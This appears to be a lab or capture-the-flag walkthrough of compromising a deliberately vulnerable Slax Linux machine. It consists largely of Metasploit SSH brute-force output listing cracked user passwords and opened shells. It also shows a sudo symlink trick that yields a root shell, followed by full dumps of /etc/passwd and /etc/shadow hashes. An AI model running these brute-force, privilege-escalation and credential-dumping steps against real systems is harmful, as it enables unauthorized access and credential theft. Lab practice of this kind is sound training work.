[+] 192.168.1.120:22 SSH - Success: 'aadams:batman' 'uid=1003(aadams) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 1 opened (192.168.1.130:60840 -> 192.168.1.120:22) at 2015-01-08 12:28:52 -0700
[+] 192.168.1.120:22 SSH - Success: 'aallen:superman' 'uid=1031(aallen) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 2 opened (192.168.1.130:33943 -> 192.168.1.120:22) at 2015-01-08 12:28:55 -0700
[+] 192.168.1.120:22 SSH - Success: 'aard:cheese' 'uid=1000(aard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 3 opened (192.168.1.130:49918 -> 192.168.1.120:22) at 2015-01-08 12:28:59 -0700
[+] 192.168.1.120:22 SSH - Success: 'aharp:pokemon' 'uid=1039(aharp) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 4 opened (192.168.1.130:38831 -> 192.168.1.120:22) at 2015-01-08 12:29:02 -0700
[+] 192.168.1.120:22 SSH - Success: 'aheflin:whatever' 'uid=1017(aheflin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 5 opened (192.168.1.130:43816 -> 192.168.1.120:22) at 2015-01-08 12:29:05 -0700
[+] 192.168.1.120:22 SSH - Success: 'amaynard:kotaku' 'uid=1018(amaynard) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 6 opened (192.168.1.130:52789 -> 192.168.1.120:22) at 2015-01-08 12:29:08 -0700
[+] 192.168.1.120:22 SSH - Success: 'aspears:iloveyou' 'uid=1035(aspears) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 7 opened (192.168.1.130:47274 -> 192.168.1.120:22) at 2015-01-08 12:29:11 -0700
[+] 192.168.1.120:22 SSH - Success: 'aweiland:666666' 'uid=1032(aweiland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 8 opened (192.168.1.130:55692 -> 192.168.1.120:22) at 2015-01-08 12:29:15 -0700
[+] 192.168.1.120:22 SSH - Success: 'bbanter:michelle' 'uid=1012(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 9 opened (192.168.1.130:47768 -> 192.168.1.120:22) at 2015-01-08 12:29:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'bphillips:123123' 'uid=1024(bphillips) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 10 opened (192.168.1.130:53612 -> 192.168.1.120:22) at 2015-01-08 12:29:22 -0700
[+] 192.168.1.120:22 SSH - Success: 'bwatkins:123456' 'uid=1037(bwatkins) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 11 opened (192.168.1.130:47820 -> 192.168.1.120:22) at 2015-01-08 12:29:26 -0700
[+] 192.168.1.120:22 SSH - Success: 'cchisholm:baseball' 'uid=1022(cchisholm) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 12 opened (192.168.1.130:54756 -> 192.168.1.120:22) at 2015-01-08 12:29:29 -0700
[+] 192.168.1.120:22 SSH - Success: 'ccoffee:0' 'uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 13 opened (192.168.1.130:55911 -> 192.168.1.120:22) at 2015-01-08 12:29:33 -0700
[+] 192.168.1.120:22 SSH - Success: 'dcooper:sunshine' 'uid=1036(dcooper) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 14 opened (192.168.1.130:47440 -> 192.168.1.120:22) at 2015-01-08 12:29:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgilfillan:starwars' 'uid=1014(dgilfillan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 15 opened (192.168.1.130:51523 -> 192.168.1.120:22) at 2015-01-08 12:29:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'dgrant:letmein' 'uid=1015(dgrant) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 16 opened (192.168.1.130:43905 -> 192.168.1.120:22) at 2015-01-08 12:29:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'djohnson:killer' 'uid=1011(djohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 17 opened (192.168.1.130:58887 -> 192.168.1.120:22) at 2015-01-08 12:29:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'dstevens:internet' 'uid=1023(dstevens) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 18 opened (192.168.1.130:42132 -> 192.168.1.120:22) at 2015-01-08 12:29:51 -0700
[+] 192.168.1.120:22 SSH - Success: 'dwestling:shadow' 'uid=1025(dwestling) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 19 opened (192.168.1.130:37133 -> 192.168.1.120:22) at 2015-01-08 12:29:54 -0700
[+] 192.168.1.120:22 SSH - Success: 'hlovell:consumer' 'uid=1021(hlovell) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 20 opened (192.168.1.130:43957 -> 192.168.1.120:22) at 2015-01-08 12:29:57 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalcantar:trustno1' 'uid=1040(jalcantar) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 21 opened (192.168.1.130:36937 -> 192.168.1.120:22) at 2015-01-08 12:30:00 -0700
[+] 192.168.1.120:22 SSH - Success: 'jalvarez:password' 'uid=1013(jalvarez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 22 opened (192.168.1.130:42853 -> 192.168.1.120:22) at 2015-01-08 12:30:04 -0700
[+] 192.168.1.120:22 SSH - Success: 'jayala:abc123' 'uid=1029(jayala) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 23 opened (192.168.1.130:34358 -> 192.168.1.120:22) at 2015-01-08 12:30:07 -0700
[+] 192.168.1.120:22 SSH - Success: 'jbresnahan:blahblah' 'uid=1002(jbresnahan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 24 opened (192.168.1.130:44168 -> 192.168.1.120:22) at 2015-01-08 12:30:10 -0700
[+] 192.168.1.120:22 SSH - Success: 'jduff:princess' 'uid=1020(jduff) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 25 opened (192.168.1.130:45406 -> 192.168.1.120:22) at 2015-01-08 12:30:14 -0700
[+] 192.168.1.120:22 SSH - Success: 'jfranklin:654321' 'uid=1027(jfranklin) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 26 opened (192.168.1.130:42125 -> 192.168.1.120:22) at 2015-01-08 12:30:17 -0700
[+] 192.168.1.120:22 SSH - Success: 'kclemons:passw0rd' 'uid=1009(kclemons) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 27 opened (192.168.1.130:50416 -> 192.168.1.120:22) at 2015-01-08 12:30:20 -0700
[+] 192.168.1.120:22 SSH - Success: 'krenfro:master' 'uid=1048(krenfro) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 28 opened (192.168.1.130:51770 -> 192.168.1.120:22) at 2015-01-08 12:30:24 -0700
[+] 192.168.1.120:22 SSH - Success: 'ktso:1234' 'uid=1005(ktso) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 29 opened (192.168.1.130:41473 -> 192.168.1.120:22) at 2015-01-08 12:30:27 -0700
[+] 192.168.1.120:22 SSH - Success: 'kwebber:dragon' 'uid=1016(kwebber) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 30 opened (192.168.1.130:38814 -> 192.168.1.120:22) at 2015-01-08 12:30:30 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmartinez:pepper' 'uid=1034(lmartinez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 31 opened (192.168.1.130:51877 -> 192.168.1.120:22) at 2015-01-08 12:30:34 -0700
[+] 192.168.1.120:22 SSH - Success: 'lmorales:football' 'uid=1028(lmorales) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 32 opened (192.168.1.130:54770 -> 192.168.1.120:22) at 2015-01-08 12:30:37 -0700
[+] 192.168.1.120:22 SSH - Success: 'mbryan:jennifer' 'uid=1042(mbryan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 33 opened (192.168.1.130:45205 -> 192.168.1.120:22) at 2015-01-08 12:30:40 -0700
[+] 192.168.1.120:22 SSH - Success: 'mholland:jordan' 'uid=1041(mholland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 34 opened (192.168.1.130:38046 -> 192.168.1.120:22) at 2015-01-08 12:30:43 -0700
[+] 192.168.1.120:22 SSH - Success: 'mnader:welcome' 'uid=1047(mnader) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 35 opened (192.168.1.130:60899 -> 192.168.1.120:22) at 2015-01-08 12:30:47 -0700
[+] 192.168.1.120:22 SSH - Success: 'mrodriguez:qwerty' 'uid=1026(mrodriguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 36 opened (192.168.1.130:51135 -> 192.168.1.120:22) at 2015-01-08 12:30:50 -0700
[+] 192.168.1.120:22 SSH - Success: 'qpowers:michael' 'uid=1001(qpowers) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 37 opened (192.168.1.130:35915 -> 192.168.1.120:22) at 2015-01-08 12:30:53 -0700
[+] 192.168.1.120:22 SSH - Success: 'rdominguez:12345' 'uid=1010(rdominguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 38 opened (192.168.1.130:53430 -> 192.168.1.120:22) at 2015-01-08 12:30:56 -0700
[+] 192.168.1.120:22 SSH - Success: 'rjacobson:111111' 'uid=1043(rjacobson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 39 opened (192.168.1.130:34041 -> 192.168.1.120:22) at 2015-01-08 12:31:00 -0700
[+] 192.168.1.120:22 SSH - Success: 'rpatel:1234567' 'uid=1045(rpatel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 40 opened (192.168.1.130:34844 -> 192.168.1.120:22) at 2015-01-08 12:31:03 -0700
[+] 192.168.1.120:22 SSH - Success: 'sgains:computer' 'uid=1019(sgains) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 41 opened (192.168.1.130:54407 -> 192.168.1.120:22) at 2015-01-08 12:31:06 -0700
[+] 192.168.1.120:22 SSH - Success: 'sjohnson:12345678' 'uid=1046(sjohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 42 opened (192.168.1.130:40759 -> 192.168.1.120:22) at 2015-01-08 12:31:09 -0700
[+] 192.168.1.120:22 SSH - Success: 'strammel:monkey' 'uid=1006(strammel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 43 opened (192.168.1.130:55731 -> 192.168.1.120:22) at 2015-01-08 12:31:12 -0700
[+] 192.168.1.120:22 SSH - Success: 'swarren:Password' 'uid=1007(swarren) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 44 opened (192.168.1.130:52038 -> 192.168.1.120:22) at 2015-01-08 12:31:16 -0700
[+] 192.168.1.120:22 SSH - Success: 'tdeleon:soccer' 'uid=1038(tdeleon) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 45 opened (192.168.1.130:48251 -> 192.168.1.120:22) at 2015-01-08 12:31:19 -0700
[+] 192.168.1.120:22 SSH - Success: 'tgoodchap:nintendo' 'uid=1030(tgoodchap) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux '
[*] Command shell session 46 opened (192.168.1.130:36430 -> 192.168.1.120:22) at 2015-01-08 12:31:22 -0700
[-] 192.168.1.120:22 SSH - Failed: ':'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I haven’t cracked root yet but notice this “‘ccoffee:0’ ‘uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin)”. the 102 admin group id is promising.

Linux 2.6.27.27.
ccoffee@slax:~$ ls
DONOTFORGET*  scripts/
ccoffee@slax:~$ cat DONOTFORGET 
remember your 20th anniversary on the 5th!!!!!!!!!1111!!
ccoffee@slax:~$ cd scripts/
ccoffee@slax:~/scripts$ ls
getlogs.sh*
ccoffee@slax:~/scripts$ cat getlogs.sh 
cat: getlogs.sh: Permission denied
ccoffee@slax:~/scripts$

Permission denied!

ccoffee@slax:~$ mv scripts/ scripts.old
ccoffee@slax:~$ mkdir scripts     
ccoffee@slax:~$ ln -s /bin/sh scripts/getlogs.sh
ccoffee@slax:~$ ls -l scripts/getlogs.sh 
lrwxrwxrwx 1 ccoffee users 7 Jan  7 23:03 scripts/getlogs.sh -> /bin/sh*
ccoffee@slax:~$ sudo scripts/getlogs.sh

What this did was move the old script folder that I didn’t have permissions to into the .old folder. The new getlogs.sh folder is linked to the shell command so doing sudo getlogs.sh creates a root shell.

There is no specific challenge so once you are on the system look around and be awesome.

root@slax:/etc# cat passwd      
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
aard:x:1000:100:Aaron Ard:/home/aard:
qpowers:x:1001:100:Quinton Powers:/home/qpowers:
jbresnahan:x:1002:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1003:100:Adam Adams:/home/aadams:
jdavenport:x:1004:100:James Davenport:/home/jdavenport:
ktso:x:1005:100:Kristen Tso:/home/ktso:
strammel:x:1006:100:Stephanie Trammel:/home/strammel:
swarren:x:1007:100:Samuel Warren:/home/swarren:
myajima:x:1008:100:Moto Yajima:/home/myajima:
kclemons:x:1009:100:Kathryn Clemons:/home/kclemons:
rdominguez:x:1010:100:Rafael Dominguez:/home/rdominguez:
djohnson:x:1011:100:Daniel Johnson:/home/djohnson:
bbanter:x:1012:100:Bob Banter:/home/bbanter:
jalvarez:x:1013:100:Joy Alvarez:/home/jalvarez:
dgilfillan:x:1014:100:Darcy Gilfillan:/home/dgilfillan:
dgrant:x:1015:100:Daniel Grant:/home/dgrant:
kwebber:x:1016:100:Kathleen Webber:/home/kwebber:
aheflin:x:1017:100:Anna Heflin:/home/aheflin:
amaynard:x:1018:100:Arthur Maynard:/home/amaynard:
sgains:x:1019:100:Susan Gains:/home/sgains:
jduff:x:1020:100:Jerry Duff:/home/jduff:
hlovell:x:1021:100:Henrietta Lovell:/home/hlovell:
cchisholm:x:1022:100:Cindy Chisholm:/home/cchisholm:
dstevens:x:1023:100:Donald Stevens:/home/dstevens:
bphillips:x:1024:100:Brad Phillips:/home/bphillips:
dwestling:x:1025:100:David Westling:/home/dwestling:
mrodriguez:x:1026:100:Manuel Rodriguez:/home/mrodriguez:
jfranklin:x:1027:100:Johnny Franklin:/home/jfranklin:
lmorales:x:1028:100:Lindsey Morales:/home/lmorales:
jayala:x:1029:100:John Ayala:/home/jayala:
tgoodchap:x:1030:100:Taj Goodchap:/home/tgoodchap:
aallen:x:1031:100:Aaron Allen:/home/aallen:
aweiland:x:1032:100:Adam Weiland:/home/aweiland:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
lmartinez:x:1034:100:Luis Martinez:/home/lmartinez:
aspears:x:1035:100:Adam Spears:/home/aspears:
dcooper:x:1036:100:Donald Cooper:/home/dcooper:
bwatkins:x:1037:100:Brandon Watkins:/home/bwatkins:
tdeleon:x:1038:100:Terrence Deleon:/home/tdeleon:
aharp:x:1039:100:Annie Harp:/home/aharp:
jalcantar:x:1040:100:Jesse Alcantar:/home/jalcantar:
mholland:x:1041:100:Marian Holland:/home/mholland:
mbryan:x:1042:100:Michael Bryan:/home/mbryan:
rjacobson:x:1043:100:Randy Jacobson:/home/rjacobson:
ccoffee:x:1044:100:Chad Coffee:/home/ccoffee:
rpatel:x:1045:100:Randall Patel:/home/rpatel:
sjohnson:x:1046:100:Steven Johnson:/home/sjohnson:
mnader:x:1047:100:Muhammad Nader:/home/mnader:
krenfro:x:1048:100:Kimberly Renfro:/home/krenfro:

root@slax:/etc# cat shadow
root:$1$6Hl/leIf$BHG4Z0HgNq2bnbRriQcCt/:16442:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
aard:$1$M/1naIfI$/dpCFIuWISrIGy408fP0U.:16442:0:99999:7:::
qpowers:$1$oDCsaIfI$PlHnGw5Ylqoke4HOfDnz81:16442:0:99999:7:::
jbresnahan:$1$nHExaIfI$xFPgXAOo9ktw2azn/qnbv.:16442:0:99999:7:::
aadams:$1$TzF0bIfI$RvB2GZOb5WDCJX.agChuB1:16442:0:99999:7:::
jdavenport:$1$3wl/neIf$kuBSySXsu5nSeNjMgBRjr1:16442:0:99999:7:::
ktso:$1$t0KAbIfI$WPULPwgsjByt0ICV6.zMS1:16442:0:99999:7:::
strammel:$1$lpLFbIfI$B9wU7zrHALtgO5PpTFEYJ1:16442:0:99999:7:::
swarren:$1$TdNKbIfI$Duy.Uy2sGwqY6YsfTzX4h1:16442:0:99999:7:::
myajima:$1$xJPPbIfI$SQc4btSCHeIIYPVE/.r6a.:16442:0:99999:7:::
kclemons:$1$IURUbIfI$Tpisuh39vd16hd9Q2W198/:16442:0:99999:7:::
rdominguez:$1$PDTZbIfI$xKK6A/ZQiFgWpYVzzd.Gw.:16442:0:99999:7:::
djohnson:$1$buUebIfI$0gd4dWKyVH2.ufk8zSq.z0:16442:0:99999:7:::
bbanter:$1$QWWjbIfI$GoRunRTIFvf9sOfrWttwS0:16442:0:99999:7:::
jalvarez:$1$AHYobIfI$gqSV2utxp46bVc0MzOFCP.:16442:0:99999:7:::
dgilfillan:$1$m0atbIfI$r5vprBT7DmEx/bNqH8RDM1:16442:0:99999:7:::
dgrant:$1$7sbybIfI$8FbpRfuY.N8hX6Sn4A4PX.:16442:0:99999:7:::
kwebber:$1$9hd1cIfI$Hsx2f74tHtVhioZegod8d.:16442:0:99999:7:::
aheflin:$1$waf6cIfI$Yq12oAcx/c176h1LC/MHJ.:16442:0:99999:7:::
amaynard:$1$nFhBcIfI$Q7LRuK3aMzhrdqZD1AjaF0:16442:0:99999:7:::
sgains:$1$U3jGcIfI$pbF6mepdppQgEM1/OnOKS1:16442:0:99999:7:::
jduff:$1$bskLcIfI$0xxI8JWghNZrwknfckK4I1:16442:0:99999:7:::
hlovell:$1$0bmQcIfI$f7yj5xtUFVmGnMtEc0F0M/:16442:0:99999:7:::
cchisholm:$1$2PoVcIfI$g2OHLIwZNfkSEwbkdXL.o/:16442:0:99999:7:::
dstevens:$1$/MqacIfI$YrH3QJethu7PXmEB5cDvB.:16442:0:99999:7:::
bphillips:$1$3BsfcIfI$AnYSJSkRMC5yvbTQIdHPN1:16442:0:99999:7:::
dwestling:$1$nvtkcIfI$WOkUDONlGepzNXM37hzDW1:16442:0:99999:7:::
mrodriguez:$1$LkvpcIfI$UYw1kRIkon2T3Kf/as.hD.:16442:0:99999:7:::
jfranklin:$1$8XxucIfI$5V78VV1YZVUaq2PyRbH82/:16442:0:99999:7:::
lmorales:$1$NOzzcIfI$xHUTPP/Myrqh8iBIF4sH00:16442:0:99999:7:::
jayala:$1$r5//2dIf$WGWmk2GfQETfIqPvnu5Eb.:16442:0:99999:7:::
tgoodchap:$1$Yo0/7dIf$jfLG8/Fv7873kFlascMdg1:16442:0:99999:7:::
aallen:$1$Zm2/CdIf$tonJrOosRTYbCzxTYcBrJ.:16442:0:99999:7:::
aweiland:$1$Jc4/HdIf$Iae3U0Lbu04YjxfO3t8f2/:16442:0:99999:7:::
dtraylor:$1$db6/MdIf$5Wtmc3YxBJkLE3TjSqwX91:16442:0:99999:7:::
lmartinez:$1$DH8/RdIf$vosY88nHAoqwPonN.tMBO1:16442:0:99999:7:::
aspears:$1$.5A/WdIf$lt4KE9Mt01qjJwH0q/TaA.:16442:0:99999:7:::
dcooper:$1$2pB/bdIf$9Bqi7D3JH7nO3YVuiKhfq.:16442:0:99999:7:::
bwatkins:$1$biD/gdIf$PqXD41GXwTEtNnNSNP7ve1:16442:0:99999:7:::
tdeleon:$1$VdF/ldIf$8VVkJorueLDB2XEdwRcvA/:16442:0:99999:7:::
aharp:$1$GjH/qdIf$SXBGXRgsaGwWst2EVA4OK.:16442:0:99999:7:::
jalcantar:$1$dXJ/vdIf$1kaaAoMN7832vQ.0h8idE1:16442:0:99999:7:::
mholland:$1$HZL/.eIf$y0VAQHlJuHxJ09uHYYXYV1:16442:0:99999:7:::
mbryan:$1$/kN/3eIf$b6lCYJUAEVi89QU501i/J.:16442:0:99999:7:::
rjacobson:$1$WuP/8eIf$mbawyIozTk2s4rMW6.ruA/:16442:0:99999:7:::
ccoffee:$1$8.S/DeIf$1FJ.To3iEN0LVosO0Xtzg/:16442:0:99999:7:::
